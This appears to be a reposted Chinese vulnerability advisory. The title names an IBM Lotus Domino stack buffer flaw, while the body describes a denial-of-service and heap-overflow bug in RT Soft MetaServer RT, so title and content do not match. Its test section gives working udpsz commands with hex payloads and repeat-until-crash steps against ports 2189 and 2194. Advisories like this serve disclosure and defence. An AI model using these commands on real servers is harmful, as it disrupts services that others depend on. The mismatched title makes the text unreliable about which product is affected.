IBM Lotus Domino “NSFComputeEvaluateExt()”函数远程栈缓冲区

liaoxuewu 2011-09-22

发布日期:2011-09-21
更新日期:2011-09-21

受影响系统:
RT Soft MetaServer 3.2.1.450
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49696

MetaServer RT是实时的数据处理和计算软件。

MetaServer RT在处理发送到TCP端口2194的恶意报文时存在拒绝服务漏洞,可被远程攻击者利用造成应用程序崩溃。

通过发送到2189、2192、2194的特制报文和不断的重复连接,可造成堆溢出。使用了"MESSA"和"ROSCO"命令。

<*来源:Luigi Auriemma ([email protected]
 
  链接:http://aluigi.altervista.org/adv/metaserver_1-adv.txt
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://aluigi.org/testz/udpsz.zip

A]
udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff

stop after at least 50 dots and relaunch the command again till the
crashing of the server during a memcpy.


B]
  udpsz -b 0x80 -T SERVER 2194 1000
  udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
  ...others...

建议:
--------------------------------------------------------------------------------
厂商补丁:

RT Soft
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.traderssoft.com/ts/msrt/

相关推荐

DodderB / 0评论 2010-08-13
hyMiss / 0评论 2010-05-10